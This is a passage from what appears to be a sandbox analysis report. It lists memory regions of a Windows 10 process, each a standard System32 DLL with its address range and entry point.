0x7ffb1ad70000 end_va = 0x7ffb1adf5fff monitored = 0 entry_point = 0x7ffb1ad91e10 region_type = mapped_file name = "notificationcontroller.dll" filename = "\\Windows\\System32\\NotificationController.dll" (normalized: "c:\\windows\\system32\\notificationcontroller.dll") Region: id = 673 start_va = 0x7ffb1ae00000 end_va = 0x7ffb1aed9fff monitored = 0 entry_point = 0x7ffb1ae33c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 674 start_va = 0x7ffb1aee0000 end_va = 0x7ffb1aefafff monitored = 0 entry_point = 0x7ffb1aeeaf40 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 675 start_va = 0x7ffb1af20000 end_va = 0x7ffb1b03ffff monitored = 0 entry_point = 0x7ffb1af58310 region_type = mapped_file name = "applicationframe.dll" filename = "\\Windows\\System32\\ApplicationFrame.dll" (normalized: "c:\\windows\\system32\\applicationframe.dll") Region: id = 676 start_va = 0x7ffb1b040000 end_va = 0x7ffb1b04bfff monitored = 0 entry_point = 0x7ffb1b0418b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 677 start_va = 0x7ffb1b050000 end_va = 0x7ffb1b09cfff monitored = 0 entry_point = 0x7ffb1b05d180 region_type = mapped_file name = "windows.immersiveshell.serviceprovider.dll" filename = "\\Windows\\System32\\windows.immersiveshell.serviceprovider.dll" (normalized: "c:\\windows\\system32\\windows.immersiveshell.serviceprovider.dll") Region: id = 678 start_va = 0x7ffb1b0a0000 end_va = 0x7ffb1bbaafff monitored = 0 entry_point = 0x7ffb1b1ea540 region_type = mapped_file name = "twinui.dll" filename = "\\Windows\\System32\\twinui.dll" (normalized: "c:\\windows\\system32\\twinui.dll") Region: id = 679 start_va = 0x7ffb1bbb0000 end_va = 0x7ffb1bbfffff monitored = 0 entry_point = 0x7ffb1bbb2580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 680 start_va = 0x7ffb1bc00000 end_va = 0x7ffb1c09ffff monitored = 0 entry_point = 0x7ffb1bc98740 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 681 start_va = 0x7ffb1c0a0000 end_va = 0x7ffb1c0e9fff monitored = 0 entry_point = 0x7ffb1c0a5800 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 682 start_va = 0x7ffb1c0f0000 end_va = 0x7ffb1c159fff monitored = 0 entry_point = 0x7ffb1c105e90 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 683 start_va = 0x7ffb1c160000 end_va = 0x7ffb1c1c4fff monitored = 0 entry_point = 0x7ffb1c164c50 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 684 start_va = 0x7ffb1c1d0000 end_va = 0x7ffb1c443fff monitored = 0 entry_point = 0x7ffb1c240400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 685 start_va = 0x7ffb1c450000 end_va = 0x7ffb1c464fff monitored = 0 entry_point = 0x7ffb1c452c90 region_type = mapped_file name = "settingsyncpolicy.dll" filename = "\\Windows\\System32\\SettingSyncPolicy.dll" (normalized: "c:\\windows\\system32\\settingsyncpolicy.dll") Region: id = 686 start_va = 0x7ffb1c470000 end_va = 0x7ffb1c53dfff monitored = 0 entry_point = 0x7ffb1c4a14c0 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 687 start_va = 0x7ffb1c540000 end_va = 0x7ffb1c638fff monitored = 0 entry_point = 0x7ffb1c588000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 688 start_va = 0x7ffb1c640000 end_va = 0x7ffb1c6f0fff monitored = 0 entry_point = 0x7ffb1c6508f0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 689 start_va = 0x7ffb1c710000 end_va = 0x7ffb1c719fff monitored = 0 entry_point = 0x7ffb1c7114c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 690 start_va = 0x7ffb1c720000 end_va = 0x7ffb1c74afff monitored = 0 entry_point = 0x7ffb1c72c3c0 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 691 start_va = 0x7ffb1c750000 end_va = 0x7ffb1c85cfff monitored = 0 entry_point = 0x7ffb1c77f420 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 692 start_va = 0x7ffb1c8e0000 end_va = 0x7ffb1c93efff monitored = 0 entry_point = 0x7ffb1c90bce0 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 693 start_va = 0x7ffb1cb20000 end_va = 0x7ffb1cb34fff monitored = 0 entry_point = 0x7ffb1cb22dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 694 start_va = 0x7ffb1cb40000 end_va = 0x7ffb1cb54fff monitored = 0 entry_point = 0x7ffb1cb41ab0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 695 start_va = 0x7ffb1cc80000 end_va = 0x7ffb1cedcfff monitored = 0 entry_point = 0x7ffb1cd08610 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 696 start_va = 0x7ffb1cee0000 end_va = 0x7ffb1cee8fff monitored = 0 entry_point = 0x7ffb1cee1480 region_type = mapped_file name = "wpportinglibrary.dll" filename = "\\Windows\\System32\\WpPortingLibrary.dll" (normalized: "c:\\windows\\system32\\wpportinglibrary.dll") Region: id = 697 start_va = 0x7ffb1d280000 end_va = 0x7ffb1d2cafff monitored = 0 entry_point = 0x7ffb1d297b70 region_type = mapped_file name = "veeventdispatcher.dll" filename = "\\Windows\\System32\\VEEventDispatcher.dll" (normalized: "c:\\windows\\system32\\veeventdispatcher.dll") Region: id = 698 start_va = 0x7ffb1d3f0000 end_va = 0x7ffb1d40afff monitored = 0 entry_point = 0x7ffb1d3f1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 699 start_va = 0x7ffb1d410000 end_va = 0x7ffb1d697fff monitored = 0 entry_point = 0x7ffb1d46f670 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 700 start_va = 0x7ffb1d700000 end_va = 0x7ffb1d70dfff monitored = 0 entry_point = 0x7ffb1d701460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 701 start_va = 0x7ffb1d810000 end_va = 0x7ffb1d81bfff monitored = 0 entry_point = 0x7ffb1d811860 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 702 start_va = 0x7ffb1d820000 end_va = 0x7ffb1d83ffff monitored = 0 entry_point = 0x7ffb1d821920 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 703 start_va = 0x7ffb1d840000 end_va = 0x7ffb1d855fff monitored = 0 entry_point = 0x7ffb1d843380 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 704 start_va = 0x7ffb1da70000 end_va = 0x7ffb1dab0fff monitored = 0 entry_point = 0x7ffb1da74840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 705 start_va = 0x7ffb1dac0000 end_va = 0x7ffb1db26fff monitored = 0 entry_point = 0x7ffb1dac63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 706 start_va = 0x7ffb1dd20000 end_va = 0x7ffb1dd39fff monitored = 0 entry_point = 0x7ffb1dd22430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 707 start_va = 0x7ffb1dd40000 end_va = 0x7ffb1dd55fff monitored = 0 entry_point = 0x7ffb1dd419f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 708 start_va = 0x7ffb1dd60000 end_va = 0x7ffb1dd97fff monitored = 0 entry_point = 0x7ffb1dd78cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 709 start_va = 0x7ffb1dda0000 end_va = 0x7ffb1ddaafff monitored = 0 entry_point = 0x7ffb1dda1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 710 start_va = 0x7ffb1df50000 end_va = 0x7ffb1dfbcfff monitored = 0 entry_point = 0x7ffb1df5d750 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll") Region: id = 711 start_va = 0x7ffb1dfc0000 end_va = 0x7ffb1dfcafff monitored = 0 entry_point = 0x7ffb1dfc1a40 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 712 start_va = 0x7ffb1e070000 end_va = 0x7ffb1e085fff monitored = 0 entry_point = 0x7ffb1e071b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 713 start_va = 0x7ffb1e100000 end_va = 0x7ffb1e127fff monitored = 0 entry_point = 0x7ffb1e108c10 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 714 start_va = 0x7ffb1e2e0000 end_va = 0x7ffb1e32dfff monitored = 0 entry_point = 0x7ffb1e2f1ce0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 715 start_va = 0x7ffb1e5c0000 end_va = 0x7ffb1e5e2fff monitored = 0 entry_point = 0x7ffb1e5c99a0 region_type = mapped_file name = "networkstatus.dll" filename = "\\Windows\\System32\\NetworkStatus.dll" (normalized: "c:\\windows\\system32\\networkstatus.dll") Region: id = 716 start_va = 0x7ffb1e5f0000 end_va = 0x7ffb1e608fff monitored = 0 entry_point = 0x7ffb1e5f4520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 717 start_va = 0x7ffb1e890000 end_va = 0x7ffb1e8a0fff monitored = 0 entry_point = 0x7ffb1e893320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 718 start_va = 0x7ffb1ea00000 end_va = 0x7ffb1eaadfff monitored = 0 entry_point = 0x7ffb1ea180c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 719 start_va = 0x7ffb1ec10000 end_va = 0x7ffb1ec64fff monitored = 0 entry_point = 0x7ffb1ec13fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 720 start_va = 0x7ffb1f150000 end_va = 0x7ffb1f30cfff monitored = 0 entry_point = 0x7ffb1f17af90 region_type = mapped_file name = "windows.ui.immersive.dll" filename = "\\Windows\\System32\\Windows.UI.Immersive.dll" (normalized: "c:\\windows\\system32\\windows.ui.immersive.dll") Region: id = 721 start_va = 0x7ffb1f310000 end_va = 0x7ffb1f691fff monitored = 0 entry_point = 0x7ffb1f361220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 722 start_va = 0x7ffb1f6a0000 end_va = 0x7ffb1f7d5fff monitored = 0 entry_point = 0x7ffb1f6cf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 723 start_va = 0x7ffb20820000 end_va = 0x7ffb208c8fff monitored = 0 entry_point = 0x7ffb20849010 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 724 start_va = 0x7ffb208d0000 end_va = 0x7ffb209ddfff monitored = 0 entry_point = 0x7ffb2091eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 725 start_va = 0x7ffb209e0000 end_va = 0x7ffb20a49fff monitored = 0 entry_point = 0x7ffb209e9d60 region_type = mapped_file name = "wincorlib.dll" filename = "\\Windows\\System32\\wincorlib.dll" (normalized: "c:\\windows\\system32\\wincorlib.dll") Region: id = 726 start_va = 0x7ffb20a50000 end_va = 0x7ffb20ae7fff monitored = 0 entry_point = 0x7ffb20a73980 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 727 start_va = 0x7ffb20af0000 end_va = 0x7ffb20b8ffff monitored = 0 entry_point = 0x7ffb20b156b0 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 728 start_va = 0x7ffb20b90000 end_va = 0x7ffb20c11fff monitored = 0 entry_point = 0x7ffb20b94ef0 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 729 start_va = 0x7ffb20c20000 end_va = 0x7ffb20c7cfff monitored = 0 entry_point = 0x7ffb20c26c90 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 730 start_va = 0x7ffb20c80000 end_va = 0x7ffb20cd0fff monitored = 0 entry_point = 0x7ffb20c825e0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 731 start_va = 0x7ffb20ec0000 end_va = 0x7ffb20f2ffff monitored = 0 entry_point = 0x7ffb20ee2960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 732 start_va = 0x7ffb21040000 end_va = 0x7ffb21107fff monitored = 0 entry_point = 0x7ffb210813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 733 start_va = 0x7ffb21110000 end_va = 0x7ffb21170fff monitored = 0 entry_point = 0x7ffb21114b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 734 start_va = 0x7ffb21440000 end_va = 0x7ffb21457fff monitored = 0 entry_point = 0x7ffb21445910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 735 start_va = 0x7ffb21640000 end_va = 0x7ffb216d1fff monitored = 0 entry_point = 0x7ffb2168a780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 736 start_va = 0x7ffb21760000 end_va = 0x7ffb217d9fff monitored = 0 entry_point = 0x7ffb21787630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 737 start_va = 0x7ffb21820000 end_va = 0x7ffb218c0fff monitored = 0 entry_point = 0x7ffb21823db0 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 738 start_va = 0x7ffb218d0000 end_va = 0x7ffb218e3fff monitored = 0 entry_point = 0x7ffb218d50c0 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 739 start_va = 0x7ffb218f0000 end_va = 0x7ffb21953fff monitored = 0 entry_point = 0x7ffb21905ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 740 start_va = 0x7ffb21b90000 end_va = 0x7ffb220d4fff monitored = 0 entry_point = 0x7ffb21d2a450 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 741 start_va = 0x7ffb220e0000 end_va = 0x7ffb2234efff monitored = 0 entry_point = 0x7ffb221922b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 742 start_va = 0x7ffb22430000 end_va = 0x7ffb2247afff monitored = 0 entry_point = 0x7ffb224472b0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 743 start_va = 0x7ffb22480000 end_va = 0x7ffb22630fff monitored = 0 entry_point = 0x7ffb225161a0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 744 start_va = 0x7ffb22650000 end_va = 0x7ffb226f1fff monitored = 0 entry_point = 0x7ffb22670a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 745 start_va = 0x7ffb22700000 end_va = 0x7ffb229a7fff monitored = 0 entry_point = 0x7ffb22793250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 746 start_va = 0x7ffb229b0000 end_va = 0x7ffb229d1fff monitored = 0 entry_point = 0x7ffb229b1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 747 start_va = 0x7ffb22a00000 end_va = 0x7ffb22abdfff monitored = 0 entry_point = 0x7ffb22a42d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 748 start_va = 0x7ffb22ac0000 end_va = 0x7ffb22ba2fff monitored = 0 entry_point = 0x7ffb22af7da0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 749 start_va = 0x7ffb22ee0000 end_va = 0x7ffb22f58fff monitored = 0 entry_point = 0x7ffb22effb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 750 start_va = 0x7ffb22f60000 end_va = 0x7ffb23025fff monitored = 0 entry_point = 0x7ffb22f63ac0 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 751 start_va = 0x7ffb23030000 end_va = 0x7ffb2306ffff monitored = 0 entry_point = 0x7ffb23043750 region_type = mapped_file name = "settingmonitor.dll" filename = "\\Windows\\System32\\SettingMonitor.dll" (normalized: "c:\\windows\\system32\\settingmonitor.dll") Region: id = 752 start_va = 0x7ffb230d0000 end_va = 0x7ffb23102fff monitored = 0 entry_point = 0x7ffb230d3800 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 753 start_va = 0x7ffb23110000 end_va = 0x7ffb235a2fff monitored = 0 entry_point = 0x7ffb2311f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 754 start_va = 0x7ffb235b0000 end_va = 0x7ffb23616fff monitored = 0 entry_point = 0x7ffb235ce710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 755 start_va = 0x7ffb23620000 end_va = 0x7ffb2366efff monitored = 0 entry_point = 0x7ffb23627ab0 region_type = mapped_file name = "inputswitch.dll" filename = "\\Windows\\System32\\InputSwitch.dll" (normalized: "c:\\windows\\system32\\inputswitch.dll") Region: id = 756 start_va = 0x7ffb23670000 end_va = 0x7ffb237f5fff monitored = 0 entry_point = 0x7ffb236bd700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 757 start_va = 0x7ffb23800000 end_va = 0x7ffb2381bfff monitored = 0 entry_point = 0x7ffb238037a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 758 start_va = 0x7ffb23820000 end_va = 0x7ffb23854fff monitored = 0 entry_point = 0x7ffb23823cc0 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 759 start_va = 0x7ffb23860000 end_va = 0x7ffb23872fff monitored = 0 entry_point = 0x7ffb23862760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 760 start_va = 0x7ffb23880000 end_va = 0x7ffb238a4fff monitored = 0 entry_point = 0x7ffb23882300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 761 start_va = 0x7ffb238e0000 end_va = 0x7ffb23904fff monitored = 0 entry_point = 0x7ffb238f5220 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 762 start_va = 0x7ffb23910000 end_va = 0x7ffb2391bfff monitored = 0 entry_point = 0x7ffb23911470 region_type = mapped_file name = "dsclient.dll" filename = "\\Windows\\System32\\dsclient.dll" (normalized: "c:\\windows\\system32\\dsclient.dll") Region: id = 763 start_va = 0x7ffb23930000 end_va = 0x7ffb23944fff monitored = 0 entry_point = 0x7ffb23932850 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 764 start_va = 0x7ffb23950000 end_va = 0x7ffb2398bfff monitored = 0 entry_point = 0x7ffb239525e0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 765 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 766 start_va = 0x7ffb23b60000 end_va = 0x7ffb23b86fff monitored = 0 entry_point = 0x7ffb23b67940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 767 start_va = 0x7ffb23b90000 end_va = 0x7ffb23c39fff monitored = 0 entry_point = 0x7ffb23bb7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 768 start_va = 0x7ffb23c40000 end_va = 0x7ffb23d3ffff monitored = 0 entry_point = 0x7ffb23c80f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 769 start_va = 0x7ffb23ee0000 end_va = 0x7ffb23f09fff monitored = 0 entry_point = 0x7ffb23ee8b90 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 770 start_va = 0x7ffb24120000 end_va = 0x7ffb24143fff monitored = 0 entry_point = 0x7ffb24123260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 771 start_va = 0x7ffb242c0000 end_va = 0x7ffb243b3fff monitored = 0 entry_point = 0x7ffb242ca960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 772 start_va = 0x7ffb24530000 end_va = 0x7ffb2453bfff monitored = 0 entry_point = 0x7ffb245327e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 773 start_va = 0x7ffb24610000 end_va = 0x7ffb24640fff monitored = 0 entry_point = 0x7ffb24617d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 774 start_va = 0x7ffb24670000 end_va = 0x7ffb246e9fff monitored = 0 entry_point = 0x7ffb24691a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 775 start_va = 0x7ffb24730000 end_va = 0x7ffb24763fff monitored = 0 entry_point = 0x7ffb2474ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 776 start_va = 0x7ffb24770000 end_va = 0x7ffb24779fff monitored = 0 entry_point = 0x7ffb24771830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 777 start_va = 0x7ffb24880000 end_va = 0x7ffb2489efff monitored = 0 entry_point = 0x7ffb24885d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 778 start_va = 0x7ffb249f0000 end_va = 0x7ffb24a4bfff monitored = 0 entry_point = 0x7ffb24a06f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 779 start_va = 0x7ffb24aa0000 end_va = 0x7ffb24ab6fff monitored = 0 entry_point = 0x7ffb24aa79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" 